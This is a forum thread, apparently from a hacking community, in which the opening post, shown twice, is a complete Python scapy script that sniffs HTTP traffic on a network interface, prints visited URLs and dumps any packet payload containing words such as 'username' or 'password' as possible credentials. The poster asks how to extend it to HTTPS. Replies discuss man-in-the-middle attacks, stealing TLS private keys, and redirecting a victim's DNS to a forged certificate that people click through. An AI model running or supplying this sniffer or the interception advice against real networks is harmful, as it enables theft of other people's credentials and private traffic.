import scapy.all as scapy
from scapy.layers import http
import argparse

def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--interface', dest = 'interface', help = 'Interface Name for which packet is supposed to be captured.')
    options = parser.parse_args()
    
    if not options.interface:
        parser.error('[-] Please specify the name of the interface, use --help for more info.')
        
    return options.interface
  
def sniffer(interface):
    scapy.sniff(iface = interface, store = False, prn = process_packet)
    
def process_packet(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print('[+] HTTP Requests/URL Requested -> {}'.format(url), '
')
        cred = get_credentials(packet)
        if cred:
            print('

[+] Possible Credential Information -> {}'.format(cred), '

')

def get_url(packet):
    return (packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path).decode('utf-8')

keywords = ('username', 'uname', 'user', 'login', 'password', 'pass', 'signin', 'signup', 'name')

def get_credentials(packet):
    if packet.haslayer(scapy.Raw):
        field_load = packet[scapy.Raw].load.decode('utf-8')
        for keyword in keywords:
            if keyword in field_load:
                return field_load
              
interface = get_args()
sniffer(interface)

So this is http sniffer but I want to sniff some https packets can any one help me with that?
then I want to decrypt that logs using wireshark.. possible?

Where do you want to run this code ? :D

Sniffing HTTPS is possible thanks other way like those : https://confluence.atlassian.com/kb/how-to-capture-http-traffic-using-wireshark-fiddler-or-tcpdump-779164332.html

(September 8, 2022, 08:01 PM)arishsingh07 Wrote:

import scapy.all as scapy
from scapy.layers import http
import argparse

def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--interface', dest = 'interface', help = 'Interface Name for which packet is supposed to be captured.')
    options = parser.parse_args()
    
    if not options.interface:
        parser.error('[-] Please specify the name of the interface, use --help for more info.')
        
    return options.interface
  
def sniffer(interface):
    scapy.sniff(iface = interface, store = False, prn = process_packet)
    
def process_packet(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print('[+] HTTP Requests/URL Requested -> {}'.format(url), '
')
        cred = get_credentials(packet)
        if cred:
            print('

[+] Possible Credential Information -> {}'.format(cred), '

')

def get_url(packet):
    return (packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path).decode('utf-8')

keywords = ('username', 'uname', 'user', 'login', 'password', 'pass', 'signin', 'signup', 'name')

def get_credentials(packet):
    if packet.haslayer(scapy.Raw):
        field_load = packet[scapy.Raw].load.decode('utf-8')
        for keyword in keywords:
            if keyword in field_load:
                return field_load
              
interface = get_args()
sniffer(interface)

So this is http sniffer but I want to sniff some https packets can any one help me with that?
then I want to decrypt that logs using wireshark.. possible?

It's called HTTP(S) for a reason, with current security it's quite hard to achieve it. You could try to do MITM attack to steal the key, but i doubt today's browser wouldn't notice it. But if you're trying to decrypt your own packet, then sure it's easy because you got the key to decrypt it yourself.

You have to identify the session key exchange and decrypt that with the private key then use that to decrypt the rest of the data in the stream.

If it's using TLS 1.3 (use of Ephemeral Diffie Hellman based key exchange) you'll have to own the client and the server.

With lower SSL/TLS versions you'll need the server RSA private key used during the key exchange.

good luck with that, but maybe it helps if you deep dive into the crypto details of TLS..then you should know what to do for most current version and "just" find a way to get the private key...(heart still bleeding? :D )

thanks

You have to get a private key to decrypt https, or maybe you can redirect all the traffic between your dns and use your own certificate. browser obv will warn the victim but most of time people just click without read so..